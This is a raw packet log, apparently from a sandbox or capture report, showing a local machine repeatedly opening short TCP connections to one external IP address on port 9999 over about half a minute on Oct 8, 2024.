Oct 8, 2024 04:21:29.718195915 CEST	54361	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:29.718254089 CEST	54361	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:29.718466997 CEST	54361	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:29.723300934 CEST	9999	54361	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:29.827008963 CEST	54362	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:29.832009077 CEST	9999	54362	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:29.832101107 CEST	54362	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:29.832236052 CEST	54362	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:29.837043047 CEST	9999	54362	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:30.764477968 CEST	9999	54362	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:30.764533043 CEST	9999	54362	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:30.764580965 CEST	54362	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:30.764615059 CEST	54362	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:30.764806986 CEST	54362	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:30.769607067 CEST	9999	54362	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:30.874953985 CEST	54363	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:30.879992962 CEST	9999	54363	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:30.880073071 CEST	54363	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:30.880175114 CEST	54363	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:30.884984016 CEST	9999	54363	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:31.774110079 CEST	9999	54363	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:31.774168015 CEST	9999	54363	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:31.774660110 CEST	54363	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:31.774867058 CEST	54363	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:31.780111074 CEST	9999	54363	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:31.890439034 CEST	54364	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:31.895715952 CEST	9999	54364	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:31.897118092 CEST	54364	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:31.897211075 CEST	54364	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:31.902199984 CEST	9999	54364	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:32.819158077 CEST	9999	54364	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:32.819202900 CEST	9999	54364	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:32.819361925 CEST	54364	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:32.819361925 CEST	54364	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:32.819463015 CEST	54364	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:32.824404955 CEST	9999	54364	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:32.939454079 CEST	54365	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:32.944621086 CEST	9999	54365	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:32.947186947 CEST	54365	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:32.947186947 CEST	54365	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:32.952092886 CEST	9999	54365	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:33.867526054 CEST	9999	54365	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:33.867572069 CEST	9999	54365	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:33.867686033 CEST	54365	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:33.867790937 CEST	54365	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:33.872592926 CEST	9999	54365	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:33.986778975 CEST	54366	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:33.991736889 CEST	9999	54366	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:33.991797924 CEST	54366	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:33.992014885 CEST	54366	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:33.996823072 CEST	9999	54366	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:34.916101933 CEST	9999	54366	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:34.916157961 CEST	9999	54366	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:34.921387911 CEST	54366	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:34.921387911 CEST	54366	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:34.927453995 CEST	9999	54366	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:35.031550884 CEST	54367	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:35.036758900 CEST	9999	54367	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:35.039766073 CEST	54367	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:35.039766073 CEST	54367	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:35.044770002 CEST	9999	54367	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:35.935211897 CEST	9999	54367	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:35.935395002 CEST	54367	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:35.935450077 CEST	9999	54367	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:35.935511112 CEST	54367	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:36.047862053 CEST	54367	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:36.048216105 CEST	54368	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:36.053244114 CEST	9999	54367	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:36.054019928 CEST	9999	54368	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:36.054105043 CEST	54368	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:36.054264069 CEST	54368	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:36.059406996 CEST	9999	54368	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:36.953233004 CEST	9999	54368	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:36.953284025 CEST	9999	54368	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:36.953438997 CEST	54368	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:36.953538895 CEST	54368	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:36.953538895 CEST	54368	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:36.958417892 CEST	9999	54368	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:37.061825037 CEST	54369	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:37.066869974 CEST	9999	54369	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:37.067219973 CEST	54369	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:37.067219973 CEST	54369	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:37.072098017 CEST	9999	54369	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:38.005522013 CEST	9999	54369	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:38.005573988 CEST	9999	54369	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:38.005589962 CEST	54369	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:38.005618095 CEST	54369	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:38.005688906 CEST	54369	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:38.010575056 CEST	9999	54369	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:38.109930992 CEST	54370	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:38.115014076 CEST	9999	54370	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:38.115087986 CEST	54370	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:38.115185976 CEST	54370	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:38.119982004 CEST	9999	54370	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:39.027264118 CEST	9999	54370	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:39.027313948 CEST	9999	54370	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:39.031493902 CEST	54370	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:39.032413960 CEST	54370	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:39.038574934 CEST	9999	54370	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:39.140775919 CEST	54371	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:39.145793915 CEST	9999	54371	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:39.145888090 CEST	54371	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:39.146049023 CEST	54371	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:39.150861979 CEST	9999	54371	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:40.068170071 CEST	9999	54371	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:40.068223953 CEST	9999	54371	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:40.068357944 CEST	54371	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:40.068358898 CEST	54371	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:40.079821110 CEST	54371	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:40.084722996 CEST	9999	54371	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:40.284095049 CEST	54372	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:40.289788008 CEST	9999	54372	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:40.289982080 CEST	54372	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:40.290108919 CEST	54372	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:40.295783997 CEST	9999	54372	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:41.181487083 CEST	9999	54372	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:41.181540012 CEST	9999	54372	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:41.181691885 CEST	54372	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:41.182116985 CEST	54372	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:41.186923027 CEST	9999	54372	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:41.297039986 CEST	54373	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:41.303093910 CEST	9999	54373	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:41.303184986 CEST	54373	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:41.303308964 CEST	54373	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:41.308166981 CEST	9999	54373	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:42.206248999 CEST	9999	54373	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:42.206264973 CEST	9999	54373	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:42.206300020 CEST	54373	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:42.206336975 CEST	54373	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:42.206430912 CEST	54373	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:42.211194038 CEST	9999	54373	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:42.312505960 CEST	54374	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:42.317511082 CEST	9999	54374	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:42.317578077 CEST	54374	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:42.317714930 CEST	54374	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:42.322561026 CEST	9999	54374	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:43.259501934 CEST	9999	54374	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:43.259553909 CEST	9999	54374	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:43.259608030 CEST	54374	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:43.259963036 CEST	54374	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:43.374325037 CEST	54374	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:43.374449968 CEST	54375	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:43.379612923 CEST	9999	54374	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:43.379658937 CEST	9999	54375	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:43.380187035 CEST	54375	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:43.380294085 CEST	54375	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:43.385226011 CEST	9999	54375	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:44.295000076 CEST	9999	54375	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:44.295057058 CEST	9999	54375	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:44.295192003 CEST	54375	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:44.295192957 CEST	54375	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:44.295455933 CEST	54375	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:44.300276995 CEST	9999	54375	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:44.406089067 CEST	54376	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:44.544768095 CEST	9999	54376	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:44.544840097 CEST	54376	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:44.545005083 CEST	54376	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:44.549806118 CEST	9999	54376	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:45.470021963 CEST	9999	54376	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:45.470074892 CEST	9999	54376	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:45.471587896 CEST	54376	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:45.471765995 CEST	54376	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:45.476691008 CEST	9999	54376	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:45.577132940 CEST	54377	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:45.582102060 CEST	9999	54377	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:45.582555056 CEST	54377	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:45.583000898 CEST	54377	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:45.588011980 CEST	9999	54377	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:46.530172110 CEST	9999	54377	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:46.530216932 CEST	9999	54377	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:46.530325890 CEST	54377	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:46.530325890 CEST	54377	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:46.533427954 CEST	54377	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:46.538250923 CEST	9999	54377	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:46.640531063 CEST	54378	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:46.645579100 CEST	9999	54378	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:46.645654917 CEST	54378	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:46.645813942 CEST	54378	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:46.650624990 CEST	9999	54378	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:47.561213017 CEST	9999	54378	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:47.561323881 CEST	9999	54378	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:47.565211058 CEST	54378	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:47.568118095 CEST	54378	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:47.572952032 CEST	9999	54378	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:47.671457052 CEST	54379	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:47.676712036 CEST	9999	54379	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:47.677073002 CEST	54379	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:47.680979967 CEST	54379	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:47.685904980 CEST	9999	54379	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:48.591609001 CEST	9999	54379	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:48.591651917 CEST	9999	54379	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:48.591691971 CEST	54379	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:48.591738939 CEST	54379	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:48.591865063 CEST	54379	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:48.597781897 CEST	9999	54379	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:48.703041077 CEST	54380	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:48.708368063 CEST	9999	54380	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:48.708452940 CEST	54380	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:48.708579063 CEST	54380	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:48.713434935 CEST	9999	54380	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:49.601284027 CEST	9999	54380	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:49.601336002 CEST	9999	54380	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:49.601653099 CEST	54380	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:49.601654053 CEST	54380	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:49.606667995 CEST	9999	54380	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:49.719456911 CEST	54381	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:49.724646091 CEST	9999	54381	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:49.724790096 CEST	54381	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:49.724983931 CEST	54381	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:49.731471062 CEST	9999	54381	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:50.679039955 CEST	9999	54381	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:50.679097891 CEST	9999	54381	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:50.679122925 CEST	54381	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:50.679209948 CEST	54381	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:50.679234028 CEST	54381	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:50.684079885 CEST	9999	54381	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:50.796950102 CEST	54382	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:50.801893950 CEST	9999	54382	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:50.801970005 CEST	54382	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:50.802109003 CEST	54382	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:50.806895018 CEST	9999	54382	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:51.701766968 CEST	9999	54382	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:51.701822042 CEST	9999	54382	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:51.703526974 CEST	54382	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:51.703632116 CEST	54382	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:51.708661079 CEST	9999	54382	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:51.812052011 CEST	54383	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:51.817174911 CEST	9999	54383	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:51.819485903 CEST	54383	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:51.819647074 CEST	54383	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:51.824582100 CEST	9999	54383	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:52.750458002 CEST	9999	54383	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:52.750503063 CEST	9999	54383	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:52.750530005 CEST	54383	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:52.750598907 CEST	54383	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:52.750643015 CEST	54383	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:52.755451918 CEST	9999	54383	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:52.859256983 CEST	54384	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:52.864120960 CEST	9999	54384	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:52.864202023 CEST	54384	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:52.864348888 CEST	54384	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:52.869129896 CEST	9999	54384	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:53.763492107 CEST	9999	54384	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:53.763540030 CEST	9999	54384	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:53.763817072 CEST	54384	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:53.764219046 CEST	54384	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:53.769030094 CEST	9999	54384	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:53.875251055 CEST	54385	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:53.880296946 CEST	9999	54385	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:53.883214951 CEST	54385	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:53.883214951 CEST	54385	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:53.888083935 CEST	9999	54385	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:54.805548906 CEST	9999	54385	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:54.805567026 CEST	9999	54385	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:54.805716991 CEST	54385	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:54.805717945 CEST	54385	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:54.805826902 CEST	54385	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:54.810650110 CEST	9999	54385	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:54.921313047 CEST	54386	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:54.929316998 CEST	9999	54386	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:54.929402113 CEST	54386	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:54.929522991 CEST	54386	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:54.935503960 CEST	9999	54386	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:55.857074022 CEST	9999	54386	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:55.857126951 CEST	9999	54386	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:55.857367992 CEST	54386	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:55.857368946 CEST	54386	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:55.862405062 CEST	9999	54386	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:55.969013929 CEST	54387	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:55.974148035 CEST	9999	54387	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:55.974215031 CEST	54387	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:55.974365950 CEST	54387	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:55.979177952 CEST	9999	54387	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:56.876753092 CEST	9999	54387	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:56.876808882 CEST	9999	54387	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:56.876826048 CEST	54387	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:56.876864910 CEST	54387	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:56.893572092 CEST	54387	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:56.898725986 CEST	9999	54387	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:57.000986099 CEST	54388	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:57.006004095 CEST	9999	54388	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:57.006087065 CEST	54388	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:57.006244898 CEST	54388	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:57.011121035 CEST	9999	54388	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:57.910780907 CEST	9999	54388	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:57.910834074 CEST	9999	54388	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:57.910870075 CEST	54388	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:57.910948038 CEST	54388	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:57.911048889 CEST	54388	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:57.915851116 CEST	9999	54388	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:58.017051935 CEST	54389	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:58.022217989 CEST	9999	54389	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:58.022403002 CEST	54389	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:58.022495985 CEST	54389	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:58.027369022 CEST	9999	54389	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:58.934586048 CEST	9999	54389	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:58.934685946 CEST	9999	54389	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:58.934762955 CEST	54389	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:58.934763908 CEST	54389	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:58.934859037 CEST	54389	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:58.939743042 CEST	9999	54389	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:59.047535896 CEST	54390	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:59.052665949 CEST	9999	54390	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:59.055340052 CEST	54390	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:59.055340052 CEST	54390	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:59.060226917 CEST	9999	54390	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:59.968897104 CEST	9999	54390	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:59.968947887 CEST	9999	54390	47.239.242.141	192.168.2.4
Oct 8, 2024 04:21:59.968981981 CEST	54390	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:59.969063044 CEST	54390	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:59.969113111 CEST	54390	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:21:59.973887920 CEST	9999	54390	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:00.078003883 CEST	54391	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:00.083235025 CEST	9999	54391	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:00.083302975 CEST	54391	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:00.083446026 CEST	54391	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:00.088259935 CEST	9999	54391	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:01.016952038 CEST	9999	54391	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:01.017009974 CEST	9999	54391	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:01.023406029 CEST	54391	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:01.023444891 CEST	54391	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:01.028517008 CEST	9999	54391	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:01.124186993 CEST	54392	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:01.129156113 CEST	9999	54392	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:01.131731987 CEST	54392	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:01.135142088 CEST	54392	9999	192.168.2.4	47.239.242.141
